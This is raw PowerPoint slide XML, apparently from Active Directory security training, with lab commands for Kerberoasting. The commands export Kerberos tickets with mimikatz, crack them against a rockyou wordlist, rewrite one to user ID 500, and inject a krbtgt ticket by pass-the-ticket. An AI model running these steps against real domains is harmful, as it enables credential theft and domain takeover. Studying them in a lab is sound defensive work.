              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>kerberoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> repository from https://github.com/nidem/kerberoast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Install Python and also enable the option to add the python.exe to the path variable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Extract the zip files and move the content to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>convinient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#&gt;</a:t>
            </a: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Set-Location -Path C:\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#download the python pyasn1 module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C:\Python27\Scripts\pip.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> pyasn1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#Create a user account with SPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>$password = 'Password1' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ConvertTo-SecureString</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AsPlainText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>New-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ADUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Name TestService1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ServicePrincipalNames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> http/spntest.a.vm.net -Enabled $true -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AccountPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> $password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#Request a Kerberos ticket for the previously created account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Add-Type -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AssemblyName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System.IdentityModel</a:t>
            </a:r>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New-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Object</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System.IdentityModel.Tokens.KerberosRequestorSecurityToken</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ArgumentList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> http/spntest.a.vm.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#dump the tickets from the cache to the current directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C:\mimikatz_\x64\mimikatz.exe "Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>list</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export</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exit</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#get the file name of the ticket file to work on</a:t>
            </a:r>
          </a:p>
          <a:p>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fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = dir -Path . -Filter *spntest.a.vm.net* | Select-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Object</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ExpandProperty</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FullName</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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C:\Python27\python.exe C:\kerberoast-master\kerberoast-master\tgsrepcrack.py C:\rockyou.txt\rockyou.txt $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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C:\Python27\python.exe C:\kerberoast-master\kerberoast-master\kerberoast.py -p Password1 -r $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http.kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -u 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C:\Python27\python.exe C:\kerberoast-master\kerberoast-master\kerberoast.py -p Password1 -r $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http.kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166476539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latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatzx64\mimikatz.exe "Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>export</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter"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latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = dir C:\mimikatz\x64 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Where-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Name -Match '(?=.*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)(?=.*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)' | Select-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -First 1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ExpandProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Name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latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe "Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter"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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
